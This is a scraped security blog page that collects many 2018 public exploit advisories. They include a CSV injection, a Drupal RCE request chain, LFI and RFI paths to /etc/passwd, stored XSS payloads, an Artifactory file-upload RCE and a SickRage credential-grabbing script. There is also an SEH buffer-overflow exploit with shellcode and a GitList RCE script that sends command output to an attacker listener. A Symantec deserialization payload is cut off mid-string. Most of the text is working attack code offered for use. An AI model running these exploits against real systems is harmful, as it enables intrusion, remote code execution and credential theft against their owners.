# Exploit Title: Blog Master Pro v1.0 - CSV Injection
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10255
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/blog-master-pro/21689781
# Version: 1.0
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
This application based on new Latest Laravel 5.5 Framework that allows web site owners to quickly add blog post, manage author and user, manage comments, manage website, manage profile and allow to create category and tag.
It is designed latest security and code standards and it is ready for high availability web sites.
Technical Details & Description:
================================
A user is able to inject a command that will be included in the exported CSV file.
Proof of Concept (PoC):
=======================
1. Login with regular user's credentials
2. Add =cmd|'/C calc'!A1 as a comment on any article
3. Log in with admin's credentials
4. Browse to Dashboard > Comments
5. Click on the CSV button to download and open the exported CSV file
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863569170
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
Retrieve the form_build_id from the response, and then triggering the exploit with :
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
This will display the result of the whoami command.
Patch your systems!
Blaklis
/*
Here's a snippet of AsyncGeneratorReturn. (https://cs.chromium.org/chromium/src/v8/src/builtins/builtins-async-generator-gen.cc?rcl=bcd1365cf7fac0d7897c43b377c143aae2d22f92&l=650)
Node* const context = Parameter(Descriptor::kContext);
Node* const outer_promise = LoadPromiseFromAsyncGeneratorRequest(req);
Node* const promise =
Await(context, generator, value, outer_promise, AwaitContext::kLength,
init_closure_context, var_on_resolve.value(), var_on_reject.value(),
is_caught);
CSA_SLOW_ASSERT(this, IsGeneratorNotSuspendedForAwait(generator));
StoreObjectField(generator, JSAsyncGeneratorObject::kAwaitedPromiseOffset,
promise);
The Await methods calls ResolveNativePromise which calls InternalResolvePromise which can invoke user JavaScript code through a "then" getter. If the AwaitedPromise is replaced by the user script, the AwaitedPromise will be immediately overwritten after the call to Await, this may lead the generator to an incorrect state.
PoC:
*/
async function* asyncGenerator() {
}
let gen = asyncGenerator();
gen.return({
get then() {
delete this.then;
gen.next();
}
});
/*
Log in debug mode:
abort: CSA_ASSERT failed: IsNotUndefined(request) [../../src/builtins/builtins-async-generator-gen.cc:328]
==== JS stack trace =========================================
Security context: 0x2b29083a3a71 <JSObject>#0#
2: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#)
==== Details ================================================
[2]: /* anonymous */(this=0x19b7b0603721 <JSGlobal Object>#1#,0x19b7b060d139 <Object map = 0x189055388c91>#2#) {
// optimized frame
--------- s o u r c e c o d e ---------
<No Source>
-----------------------------------------
}
==== Key ============================================
#0# 0x2b29083a3a71: 0x2b29083a3a71 <JSObject>
#1# 0x19b7b0603721: 0x19b7b0603721 <JSGlobal Object>
#2# 0x19b7b060d139: 0x19b7b060d139 <Object map = 0x189055388c91>
=====================
Received signal 4 ILL_ILLOPN 7fb143ae2781
==== C stack trace ===============================
[0x7fb143ae643e]
[0x7fb143ae6395]
[0x7fb1436ce390]
[0x7fb143ae2781]
[0x7fb1430f23ae]
[0x7fb1430f1ef7]
[0x1c8e08204384]
[end of stack trace]
Illegal instruction
*/
# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - Local File Inclusion
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10260
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
Local File Inclusion vulnerability found logged as low privileged user.
Proof of Concept (PoC):
=======================
LFI:
http://localhost/[path]/admin/download?type=task&filename=../../../../../../../../etc/passwd
# Exploit Title: HRSALE The Ultimate HRM 1.0.2 - Authenticated Cross Site Scripting
# Date: 2018-04-23
# Exploit Author: 8bitsec
# CVE: CVE-2018-10259
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619
# Version: 1.0.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.13]
Release Date:
=============
2018-04-23
Product & Service Introduction:
===============================
HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers.
Technical Details & Description:
================================
Authenticated Stored XSS vulnerability found logged as low privileged user.
Proof of Concept (PoC):
=======================
Authenticated Stored XSS:
Dashboard > My Profile. Write the payload on the 'First Name' input field:
john doe<script>alert()</script>
/*
When the parser parses the parameter list of an arrow function contaning destructuring assignments, it can't distinguish whether the assignments will be actually in the parameter list or just assignments until it meets a "=>" token. So it first assigns the destructuring assignments to the outer scope, and fixs the scope when it meets the "=>" token.
Here's the methods used to fix the scope (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=407).
void RewindDestructuringAssignments(int pos) {
destructuring_assignments_to_rewrite_.Rewind(pos);
}
void SetDestructuringAssignmentsScope(int pos, Scope* scope) {
for (int i = pos; i < destructuring_assignments_to_rewrite_.length();
++i) {
destructuring_assignments_to_rewrite_[i]->set_scope(scope);
}
}
Since the SetDestructuringAssignmentsScope method changes the scope from "pos" to the end of the list, it needs to call the RewindDestructuringAssignments method after fixing the scope. But the RewindDestructuringAssignments method is only called when the arrow function's body starts with a "{" token (https://cs.chromium.org/chromium/src/v8/src/parsing/parser-base.h?rcl=787ecbb389741d2b76131f9fa526374a0dbfcff6&l=4418).
So it can't properly handle the following case where a destructuring assignment expression containing a single line arrow function. It will set the scope of the inner destructuring assignments to the outer arrow function's scope.
PoC:
*/
(({a = (async ({b = {a = c} = {
a: 0x1234
}}) => 1)({})}, c) => 1)({});
/*
Log:
Received signal 10 BUS_ADRERR 12340000001f
==== C stack trace ===============================
[0x00010edde85e]
[0x7fff53e54f5a]
[0x000000000000]
[0x7eb48331b6d8]
[0x7eb48331b6d8]
[end of stack trace]
Bus error: 10
*/
# Exploit Title: October CMS User Plugin v1.4.5 - Persistent Cross-Site Scripting
# Date: 2018-04-03
# Author: 0xB9
# Software Link: https://octobercms.com/plugin/rainlab-user
# Version: 1.4.5
# Tested on: Ubuntu 17.10
# CVE: CVE-2018-10366
#1. Description:
Front-end user management for October CMS. Allows visitors to create a website.
#2. Proof of Concept:
Persistent XSS
- Go to the account page localhost/OctoberCMS/account/
- Register & enter the following for your full name <p """><SCRIPT>alert("XSS")</SCRIPT>">
- You will be alerted everytime you visit the account page localhost/OctoberCMS/account/
#3. Solution:
Update to 1.4.6
# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion
# Date: 2018-04-25
# Exploit Author: Wadeek
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip
# Software Version: 1.0
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")
# Tested on: Apache2 with PHP 7 on Linux
# Category: webapps
1. Version Disclosure
/wp-content/plugins/wp-with-spritz/readme.txt
2. Source Code
if(isset($_GET['url'])){
$content=file_get_contents($_GET['url']);
3. Proof of Concept
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec
# Exploit Title: Jfrog Artifactory < 4.16 - Unauthenticated Arbitrary File Upload / Remote Command Execution
# Date: 2018-04-25
# Exploit Author: Alessio Sergi
# Vendor Homepage: https://jfrog.com/artifactory/
# Software Link: https://bintray.com/jfrog/artifactory/download_file?file_path=jfrog-artifactory-oss-4.15.0.zip
# CVE : CVE-2016-10036
Jfrog Artifactory < 4.16 is vulnerable to unauthenticated arbitrary file upload and directory traversal vulnerabilities.
The vulnerabilities are within the upload api "/artifactory/ui/artifact/upload", require that "Allow Anonymous Access" is enabled (as it is on a default installation) and can be abused to create or overwrite files on the server. Specifically, it is possible to create or overwrite any files inside the application folder (scenario 1) or deploy a new application (scenario 2) and execute arbitrary code on the server.
Scenario 1: It is possible to modify the html files of the application just by executing an http post request like the one below, which exploits a directory traversal vulnerability on the parameter "filename" to insert the javascript code "<SCRIPT>alert(/Vulnerable/)</SCRIPT>" within the file app.html :
******
POST /artifactory/ui/artifact/upload HTTP/1.1
Host: [removed]
User-Agent: [removed]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 1749
Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
Connection: close
-----------------------------6085305491255810029929874687
Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/artifactory/webapp/app.html"
Content-Type: application/zip
<!DOCTYPE html>
<html ng-app="artifactory.ui">
<head>
<meta charset="UTF-8">
<meta name="google" content="notranslate">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<link rel="icon" type="image/x-icon" href="images/favicon.40350.ico"/>
<!-- Stylesheets -->
<link rel="stylesheet" href="css/vendorStyles.40350.css"/>
<link rel="stylesheet" href="css/application.40350.css"/>
<title></title>
</head>
<body jf-body-class ng-class="{'load-complete':jfBodyClass.isLoadCompleted()}">
<jf-spinner domain="body"></jf-spinner>
<toaster-container></toaster-container>
<ui-view></ui-view>
<!-- Javascript -->
<script type="text/javascript" src="vendorScripts.40350.js"></script>
<script type="text/javascript" src="templates.40350.js"></script>
<!-- Application code -->
<script src="artifactory_core.40350.js"></script>
<script src="artifactory_services.40350.js"></script>
<script src="artifactory_dao.40350.js"></script>
<script src="artifactory_ui.40350.js"></script>
<script src="artifactory_ui_components.40350.js"></script>
<script src="artifactory_directives.40350.js"></script>
<script src="artifactory_filters.40350.js"></script>
<script src="artifactory_views.40350.js"></script>
<script src="artifactory_states.40350.js"></script>
<script src="artifactory_main.40350.js"></script>
<SCRIPT>alert(/Vulnerable/)</SCRIPT>
</body>
</html>
-----------------------------6085305491255810029929874687--
******
(It is also possible to exploit this vulnerability to create JSP files within the application folder, but the tomcat used by Artifactory on a default installation won't execute them.)
Scenario 2:
It is possible to exploit the same vulnerability to deploy a malicious servlet application on the tomcat server and obtain remote code execution:
******
POST /artifactory/ui/artifact/upload HTTP/1.1
Host: [removed]
User-Agent: [removed]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Length: 3515
Content-Type: multipart/form-data; boundary=---------------------------6085305491255810029929874687
Connection: close
-----------------------------6085305491255810029929874687
Content-Disposition: form-data; name="file"; filename="../../../tomcat/webapps/malicious-servlet.war"
Content-Type: application/zip
PK��3[--SNIP--]
WEB-INF/lib/PK������r��>����
-----------------------------6085305491255810029929874687--
******
# Exploit Title: MyBB Threads to Link Plugin v1.3 - Persistent XSS
# Date: 3/15/2018
# Author: 0xB9
# Contact: luxorforums.com/User-0xB9 or 0xB9[at]protonmail.com
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1065
# Version: v1.3
# Tested on: Ubuntu 17.10
CVE: CVE-2018-10365
1. Description:
When editing a thread the user is given to the option to convert the thread to a link.
2. Proof of Concept:
Persistent XSS
- Edit a thread or post you've made
- At the bottom of the edit page in the Thread Link box input the following <a """><SCRIPT>alert("XSS")</SCRIPT>">
- Now visit the forum your thread/post exists in to see the alert.
3. Solution:
The plugin has since been removed after notifying the author.
Patch in line 83:
$thread['tlink'] = ($thread['tlink']);
to
$thread['tlink'] = htmlspecialchars_uni($thread['tlink']);
# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
# Date: 2018-04-01
# Exploit Author: Sven Fassbender
# Vendor Homepage: https://sickrage.github.io
# Software Link: https://github.com/SickRage/SickRage
# Version: < v2018.03.09-1
# CVE : CVE-2018-9160
# Category: webapps
#1. Background information
"SickRage is an automatic Video Library Manager for TV Shows.
It watches for new episodes of your favourite shows, and when they are posted it does its magic:
automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io
#2. Vulnerability description
SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses.
Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default)
HTTP request:
GET /config/general/ HTTP/1.1
Host: 192.168.1.13:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.13:8081/config/backuprestore/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
HTTP response:
HTTP/1.1 200 OK
Content-Length: 113397
Vary: Accept-Encoding
Server: TornadoServer/4.5.1
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"
Date: Fri, 02 Mar 2018 10:47:51 GMT
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="nl_NL">
<head>
[...]
<input type="text" name="git_username" id="git_username" value="email@example.com" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />
[...]
<input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />
[...]
</div>
</body>
</html>
#3. Proof of Concept
#!/usr/bin/env python
import urllib3
import sys
import requests
from BeautifulSoup import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
if __name__ == '__main__':
if len(sys.argv) != 3:
print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
else:
host = sys.argv[1]
print "https://www.shodan.io/host/{0}".format(host)
port = sys.argv[2]
print "*** Get GitHub User credentials from SickRage ***"
url = "http://{0}:{1}/config/general".format(host, port)
response = requests.get(url, timeout=5)
parsed_html = BeautifulSoup(response.text)
try:
git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value")
if str(git_password) != "None" and str(git_password) != "None":
if len(git_password) >= 1 and len(git_username) >= 1:
print str(git_username)
print str(git_password)
except AttributeError:
pass
#4. Timeline
[2018-03-07] Vulnerability discovered
[2018-03-08] Vendor contacted
[2018-03-08] Vendor replied
[2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)
#5. Recommendation
Update the SickRage installation on v2018.03.09-1 or later.
Protect the access to the web application with proper user credentials.
# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos
1. www.shodan.io (with title "Opening...")
"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="
2. Proof of Concept
:System Log:
/data/systemlog.txt?operation=save
:Encrypted Configuration File:
/data/config.bin?operation=backup
:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'
#######################################################
# Exploit Title: Allok AVI to DVD SVCD VCD Converter 4.0.1217 - Buffer Overflow (SEH)
# Date: 25.04.2018
# Exploit Author:T3jv1l
# Vendor Homepage:http://www.alloksoft.com/
# Software: www.alloksoft.com/allok_avi2dvd.exe
# Category:Local
# Contact:https://twitter.com/T3jv1l
# Version: Allok AVI to DVD SVCD VCD Converter 4.0.1217
# Tested on: Windows 7 SP1 x86
# Method Corelan Coder : https://www.corelan.be/index.php/2009/07/28/seh-based-exploit-writing-tutorial-continued-just-another-example-part-3b/
#############################################################
print"""
#1. Download and install the setup file
#2. Run this exploit code via python 2.7
#3. A file "Evil.txt" will be created
#4. Copy the contents of the file (Evil.txt)and paste in the License Name field
#5. Click Register and BOMM !!!! """
import struct
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09) # pop edi, pop esi, ret [SkinMagic.dll]
nop = "\x90" * 20
#Windows - MessageBox + Null-Free Shellcode (113 bytes) : BrokenByte
buf= ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
crush = "T" * (4000 - len(junk + nseh + seh + nop + buf))
exploit = junk + nseh + seh + nop + buf + crush
try:
file = open("Evil.txt","wb")
file.write(exploit)
file.close()
except:
print "[+] Don't Crush me !"
'''
# Exploit Title: GitList 0.6 Unauthenticated RCE
# Date: 25-04-2018
# Software Link: https://github.com/klaussilveira/gitlist
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
Bypass/Exploit `escapeshellarg` using argument injection: `git grep --open-files-in-pager=whoami`.
More info about this technique:
https://security.szurek.pl/exploit-bypass-php-escapeshellarg-escapeshellcmd.html
2. Proof of Concept
'''
import requests
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urlparse
import urllib
import threading
import time
import os
import re
url = 'http://192.168.1.1/gitlist/'
command = 'id'
your_ip = '192.168.1.100'
your_port = 8001
print "GitList 0.6 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "REMEMBER TO DISABLE FIREWALL"
search_url = None
r = requests.get(url)
repos = re.findall(r'/([^/]+)/master/rss', r.text)
if len(repos) == 0:
print "[-] No repos"
os._exit(0)
for repo in repos:
print "[+] Found repo {}".format(repo)
r = requests.get("{}{}".format(url, repo))
files = re.findall(r'href="[^\"]+blob/master/([^\"]+)"', r.text)
for file in files:
r = requests.get("{}{}/raw/master/{}".format(url, repo, file))
print "[+] Found file {}".format(file)
print r.text[0:100]
search_url = "{}{}/tree/{}/search".format(url, repo, r.text[0:1])
break
if not search_url:
print "[-] No files in repo"
os._exit(0)
print "[+] Search using {}".format(search_url)
class GetHandler(BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = urlparse.urlparse(self.path)
print "[+] Command response"
print urllib.unquote_plus(parsed_path.query).decode('utf8')[2:]
self.send_response(200)
self.end_headers()
self.wfile.write("OK")
os._exit(0)
def log_message(self, format, *args):
return
def exploit_server():
server = HTTPServer((your_ip, your_port), GetHandler)
server.serve_forever()
print "[+] Start server on {}:{}".format(your_ip, your_port)
t = threading.Thread(target=exploit_server)
t.daemon = True
t.start()
print "[+] Server started"
r = requests.post(search_url, data={'query':'--open-files-in-pager=php -r "file_get_contents(\\"http://{}:{}/?a=\\".urlencode(shell_exec(\\"{}\\")));"'.format(your_ip, your_port, command)})
while True:
time.sleep(1)
'''
3. Solution:
Update to version 0.7.0
https://github.com/klaussilveira/gitlist/releases/tag/0.7.0
'''
# Exploit Title: Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability via "Admin Site title" in Settings
# Date: 2018-04-23
# Exploit Author: Wenming Jiang
# Vendor Homepage: https://github.com/philippe/FrogCMS
# Software Link: https://github.com/philippe/FrogCMS
# Version: 0.9.5
# Tested on: php 5.6, apache2.2.29, macos 10.12.6
# CVE :CVE-2018-10321
Description:
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability when an attacker has access to Settings page, and enters the payload via "Admin Site title" in Settings.
Steps to replicate:
log into the system as an administrator role;
enter page: http://your_site/frogcms/admin/?/setting, and click Settings option;
navigate to "Admin Site title" section
enter payload as shown in below section:
Frog CMS1</a><img src=1 onerror="alert()" /><a>
visit http://your_site/frogcms/admin/?/login, you will triage JavaScript execution
Exploit Code:
Frog CMS1</a><img src=1 onerror="alert()" /><a>
Impacts:
Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
Affected Version:
0.9.5
Affected URL:
http://your_site/frogcms/admin/?/login
#!/bin/bash/env python3
#
# ____ _ _ _
# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __
# \___ \ / _ \ '__| |/ _` | |/ _` | __/ _ \| '__|
# ___) | __/ | | | (_| | | (_| | || (_) | |
# |____/ \___|_| |_|\__,_|_|\__,_|\__\___/|_|
#
# By Nikhil Sreekumar (@roo7break)
#
import sys
import base64
import httplib2
import socket
import argparse
import socket
import os
import struct
import ctypes
version = "0.1"
banner = """
____ _ _ _
/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __
\___ \ / _ \ '__| |/ _` | |/ _` | __/ _ \| '__|
___) | __/ | | | (_| | | (_| | || (_) | |
|____/ \___|_| |_|\__,_|_|\__,_|\__\___/|_|
by Nikhil Sreekumar (@roo7break) v %s
""" % version
def hex2raw3(teststr):
"""
This function takes a string (expecting hexstring) and returns byte string
"""
# From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/
bytes = []
teststr = ''.join( teststr.split(" ") )
for i in range(0, len(teststr), 2):
bytes.append( chr( int (teststr[i:i+2], 16 ) ) )
return "".join(bytes)
def symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):
# The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus
"""
This function sets up the attack payload for Symantec Endpoint
"""
java_payload = '\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x25\x63\x6f\x6d\x2e\x73\x79\x67\x61\x74\x65\x2e\x73\x63\x6d\x2e\x75\x74\x69\x6c\x2e\x52\x75\x6e\x43\x6f\x6d\x6d\x61\x6e\x64\x48\x61\x6e\x64\x6c\x65\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0e\x72\x75\x6e\x43\x6f\x6d\x6d\x61\x6e\x64\x4c\x69\x6e\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x01\x76\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\